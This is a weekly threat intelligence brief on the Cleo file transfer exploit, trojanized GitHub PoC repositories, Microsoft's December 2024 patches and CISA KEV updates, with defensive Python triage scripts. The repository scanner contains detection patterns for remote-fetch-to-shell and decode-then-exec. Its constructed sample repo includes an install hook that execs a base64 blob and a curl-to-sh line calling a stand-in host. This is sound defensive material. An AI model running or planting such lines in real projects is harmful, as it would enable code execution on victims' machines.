Threat Intel Brief for December 9 - December 15, 2024

Written by CoreTek | Dec 20, 2024 5:44:18 PM

In this weekly Threat Intelligence Brief we look back at top stories and security related callouts to provide relevant and actionable insights for the information security consumer.

We reference threat intelligence gained through our position as a security provider as well as industry sources in the development of this brief.

In this edition:
Cleo file transfer software vulnerability
Trojanized GitHub projects
Microsoft December 2024 Patch Tuesday
CISA KEV updates

Cleo file transfer software vulnerability

A critical vulnerability in Cleo's Harmony, VLTrader, and LexiCom file transfer software has been exploited in recent ransomware attacks, according to threat researchers at Huntress. CVE-2024-55956 allows an unauthenticated user to import and execute Bash or PowerShell commands on the host system via the Autorun directory. The Cl0p ransomware gang has taken credit for widespread exploitation of the vulnerability; the gang is best known for its heavy involvement in the 2023 MOVEit data breach.

Some confusion exists because an earlier designation, CVE-2024-50623, was patched in version 5.8.0.21. That version was found to still be vulnerable, and additional fixes were released a few days later. According to Cleo's security advisory, the following product versions are affected:

Cleo Harmony® (prior to version 5.8.0.24)
Cleo VLTrader® (prior to version 5.8.0.24)
Cleo LexiCom® (prior to version 5.8.0.24)

The recommendation is to upgrade to version 5.8.0.24 as soon as possible. Huntress has compiled a list of known IoCs and the tradecraft observed in this activity; see the linked source material for more in-depth information.
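Two checks a responder wants here are a correct version comparison (5.8.0.21 must still come out as affected) and a quick look at what has recently landed in the Autorun directory, since that is where exploitation drops its commands. The script below is an added example, not Cleo's or Huntress's code. It assumes the version string is whatever the product reports (About dialog or install notes) and that the operator supplies the Autorun directory path; the default location of that directory is not taken from the page.

```python
"""Triage helpers for the Cleo advisory: version check plus a look at the
Autorun directory. Added example, not Cleo's or Huntress's code. Assumptions:
the version string is whatever the product reports, and the operator supplies
the Autorun directory path (its default location is not taken from the page)."""
import os
import sys
import time

# Cleo's advisory: Harmony, VLTrader and LexiCom prior to 5.8.0.24 are affected.
FIXED_VERSION = (5, 8, 0, 24)


def parse_version(version: str) -> tuple:
    """'5.8.0.21' -> (5, 8, 0, 21). Compare as integer tuples, never as strings:
    as strings, '5.8.0.9' would sort after '5.8.0.24' and be called fixed."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {version!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))  # '5.8' compares like 5.8.0.0


def is_vulnerable(version: str) -> bool:
    """True for any build before 5.8.0.24. This includes 5.8.0.21, which only
    addressed CVE-2024-50623 and was still exploitable."""
    return parse_version(version) < FIXED_VERSION


def recent_entries(entries, since_epoch: float):
    """Filter (path, mtime_epoch) pairs to those modified at or after
    since_epoch, newest first. Exploitation writes into Autorun, so anything
    recent there that an administrator did not place deserves a look."""
    hits = [(p, t) for p, t in entries if t >= since_epoch]
    return sorted(hits, key=lambda e: e[1], reverse=True)


def scan_autorun(autorun_dir: str, since_epoch: float):
    """Walk the Autorun directory on disk and hand the listing to recent_entries()."""
    found = []
    for root, _dirs, files in os.walk(autorun_dir):
        for name in files:
            path = os.path.join(root, name)
            found.append((path, os.stat(path).st_mtime))
    return recent_entries(found, since_epoch)


if __name__ == "__main__":
    for v in ("5.8.0.21", "5.8.0.24", "5.8.0.9"):
        print(f"{v}: {'VULNERABLE' if is_vulnerable(v) else 'fixed'}")
    # Usage: python cleo_triage.py <autorun_dir>   (path is operator-supplied)
    if len(sys.argv) > 1:
        week_ago = time.time() - 7 * 86400
        for path, mtime in scan_autorun(sys.argv[1], week_ago):
            print(time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(mtime)), path)
```

The mtime filter is a starting point, not proof of compromise: compare any hits against change records and the Huntress IoCs before acting on them.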

Sources: Cleo, Huntress

Trojanized GitHub projects

An emerging threat actor tracked as MUT-1244 was profiled in a recent report from Datadog Security Labs. The report details the actor's use of both phishing and trojanized GitHub repositories to gain initial access to victim environments. The attack flow graphic in Datadog's report (not reproduced here) gives additional high-level context.

Many of the GitHub repos posed as working exploit PoC code aimed at fooling red teamers, penetration testers, security researchers, and even malicious actors. Speaking to the success of this tactic, the report states: "Over 390,000 credentials, believed to be WordPress accounts, have been exfiltrated to the threat actor through the malicious code in trojanized 'yawpp' GitHub project". The lesson here is to always be wary of unverified GitHub projects.
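"Be wary" is easier to act on with a pre-flight check that runs before anyone installs or executes an unverified PoC. The scanner below is an added example, not Datadog's tooling; its heuristics (install-time hooks, decode-then-exec, remote fetch piped into a shell, long encoded blobs) are assumptions about what trojanized repositories commonly carry, not MUT-1244 indicators from the report, and the sample repository it ships with is constructed.

```python
"""Pre-flight triage for an untrusted PoC repository before anyone runs it.
Added example, not Datadog's tooling. The heuristics are assumptions about what
trojanized repos commonly carry; they are not MUT-1244 indicators from the report."""
import os
import re

# Files whose contents run automatically on install/build, so a hit there
# executes before the "PoC" is ever invoked deliberately.
INSTALL_HOOK_FILES = {"setup.py", "pyproject.toml", "package.json", "Makefile"}

# (label, regex) pairs; constructed heuristics, tune to taste.
PATTERNS = [
    ("exec-of-decoded-blob",
     re.compile(r"\b(exec|eval)\s*\(\s*(base64|zlib|codecs|bytes\.fromhex|marshal)")),
    ("decode-then-exec-same-line",
     re.compile(r"(b64decode|base64\s+-d)[^\n]{0,120}\b(exec|eval|system|popen)\b")),
    ("remote-fetch-to-shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")),
    ("npm-lifecycle-hook",
     re.compile(r'"(pre|post)?install"\s*:')),
    ("setuptools-install-hook",
     re.compile(r"cmdclass\s*=\s*\{[^}]*['\"](install|develop|egg_info)['\"]")),
    ("long-base64-literal",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]


def scan_files(files):
    """files: {relative_path: text}. Returns (path, line, label, context) tuples;
    context records whether the file executes on install or only when invoked."""
    findings = []
    for path, text in files.items():
        auto = os.path.basename(path) in INSTALL_HOOK_FILES
        context = "runs-on-install" if auto else "runs-when-invoked"
        for label, rx in PATTERNS:
            for m in rx.finditer(text):
                line = text.count("\n", 0, m.start()) + 1
                findings.append((path, line, label, context))
    return findings


def verdict(findings):
    """BLOCK if anything fires in an install hook or pipes remote code into a
    shell; REVIEW for other hits; CLEAN otherwise."""
    if any(c == "runs-on-install" or l == "remote-fetch-to-shell" for _, _, l, c in findings):
        return "BLOCK"
    return "REVIEW" if findings else "CLEAN"


def load_repo(root, max_bytes=512_000):
    """Read a checkout into {path: text}, skipping .git, node_modules and large/binary files."""
    files = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.getsize(full) > max_bytes:
                continue
            try:
                with open(full, encoding="utf-8") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
            except (UnicodeDecodeError, OSError):
                continue
    return files


SAMPLE_REPO = {  # constructed for this example; not a real project
    "README.md": "# PoC\nUsage: python exploit.py <target>\n",
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import base64\n"
        "PAYLOAD = 'aW1wb3J0IG9z'  # constructed stand-in for an obfuscated blob\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        exec(base64.b64decode(PAYLOAD))\n"
        "        install.run(self)\n"
        "setup(name='poc', cmdclass={'install': PostInstall})\n"
    ),
    "exploit.py": (
        "import os\n"
        "os.system('curl -s http://updates.example.invalid/x.sh | sh')\n"
    ),
    "package.json": '{"name": "poc", "scripts": {"postinstall": "node setup.js"}}\n',
}

if __name__ == "__main__":
    import sys
    repo = load_repo(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REPO
    hits = scan_files(repo)
    for path, line, label, context in hits:
        print(f"{path}:{line}: {label} [{context}]")
    print("verdict:", verdict(hits))
```

Run it against a fresh clone before `pip install .` or `npm install`; the install-hook distinction matters because a setuptools `cmdclass` or an npm `postinstall` script runs the moment the package is installed, not when the exploit is launched.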

Sources: Datadog, The Hacker News

Microsoft December 2024 Patch Tuesday

74 vulnerabilities were fixed in total, including 16 rated critical. Affected products include Microsoft Defender for Endpoint, Windows Hyper-V, Windows Cloud Files Mini Filter Driver, Windows Remote Desktop, Windows Message Queuing, Windows Mobile Broadband, Windows Kernel-Mode Drivers, and more.

One actively exploited zero-day vulnerability was patched:

CVE-2024-49138: Windows Common Log File System Driver Elevation of Privilege Vulnerability - CVSS 7.8

Official Microsoft release notes with links to all the individual CVEs can be found here: https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec

Sources: Microsoft, Qualys

CISA KEV updates

CISA has added 2 new CVEs to their Known Exploited Vulnerabilities (KEV) catalog this week:

Don't know where to begin with vulnerability management?

Using CISA's KEV catalog as a risk-based approach can be a great way to prioritize vulnerability remediation in your organization. CISA also publishes guidance on how to put the KEV catalog to use.
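In practice that means joining your scanner's CVE list against the KEV feed and letting KEV membership, the known-ransomware flag and CISA's due date drive the order of work. The script below is an added example, not CISA's or Coretek's tooling. The live catalog is published as JSON at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; the feed embedded here is a constructed stand-in shaped like that file, and its dates and ransomware flags are placeholders rather than the catalog's real values. The scanner output is likewise constructed, and CVE-2024-55956 is deliberately left out of the sample catalog to exercise the not-listed path.

```python
"""Ranking scanner output against CISA's KEV catalog. Added example, not CISA's
or Coretek's tooling. SAMPLE_KEV_JSON is a constructed stand-in shaped like the
live feed; its dates and ransomware flags are placeholders, not real values."""
import json
from datetime import date

SAMPLE_KEV_JSON = json.dumps({
    "title": "constructed sample",
    "vulnerabilities": [
        {"cveID": "CVE-2024-49138", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2024-12-10", "dueDate": "2024-12-31",
         "knownRansomwareCampaignUse": "Unknown"},   # placeholder values
        {"cveID": "CVE-2024-50623", "vendorProject": "Cleo", "product": "Multiple Products",
         "dateAdded": "2024-12-13", "dueDate": "2025-01-03",
         "knownRansomwareCampaignUse": "Known"},     # placeholder values
    ],
})

# Constructed scanner output: (asset, CVE). CVE-2024-55956 is left out of the
# sample catalog on purpose to exercise the not-listed path; check the live feed.
SAMPLE_FINDINGS = [
    ("mft-gateway-01", "CVE-2024-55956"),
    ("file-server-02", "CVE-2024-49138"),
    ("mft-gateway-01", "CVE-2024-50623"),
]

TIERS = {
    0: "P0: in KEV, known ransomware campaign use",
    1: "P1: in KEV, CISA due date passed",
    2: "P2: in KEV",
    3: "P3: not in KEV (rank by CVSS and exposure)",
}


def load_kev(feed_text: str) -> dict:
    """Index the feed by CVE ID for constant-time lookups."""
    return {v["cveID"]: v for v in json.loads(feed_text)["vulnerabilities"]}


def tier_for(entry, today: date) -> int:
    """Map one KEV record (or None when the CVE is not listed) to a tier."""
    if entry is None:
        return 3
    if entry.get("knownRansomwareCampaignUse") == "Known":
        return 0
    if date.fromisoformat(entry["dueDate"]) <= today:
        return 1
    return 2


def prioritize(findings, kev: dict, today: str):
    """Return findings as dicts sorted most-urgent first: tier, then earliest
    due date, then CVE ID for a stable order. `today` is an ISO date string."""
    today_d = date.fromisoformat(today)
    rows = []
    for asset, cve in findings:
        entry = kev.get(cve)
        t = tier_for(entry, today_d)
        rows.append({"asset": asset, "cve": cve, "tier": t, "label": TIERS[t],
                     "dueDate": entry["dueDate"] if entry else None})
    rows.sort(key=lambda r: (r["tier"], r["dueDate"] or "9999-12-31", r["cve"]))
    return rows


if __name__ == "__main__":
    kev = load_kev(SAMPLE_KEV_JSON)
    for r in prioritize(SAMPLE_FINDINGS, kev, "2025-01-15"):
        print(f"{r['label']:<45} {r['cve']}  {r['asset']}  due={r['dueDate']}")
```

Swap `SAMPLE_KEV_JSON` for the downloaded feed and `SAMPLE_FINDINGS` for your scanner export; a P3 result does not mean "ignore", only that KEV offers no evidence of exploitation and CVSS plus exposure should decide its place in the queue.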

Source: Known Exploited Vulnerabilities Catalog | CISA

Coretek's managed SOC/SIEM customers benefit from the latest threat intelligence. If you're interested in learning more about what Coretek can offer your organization, please reach out: https://coretek.com/contact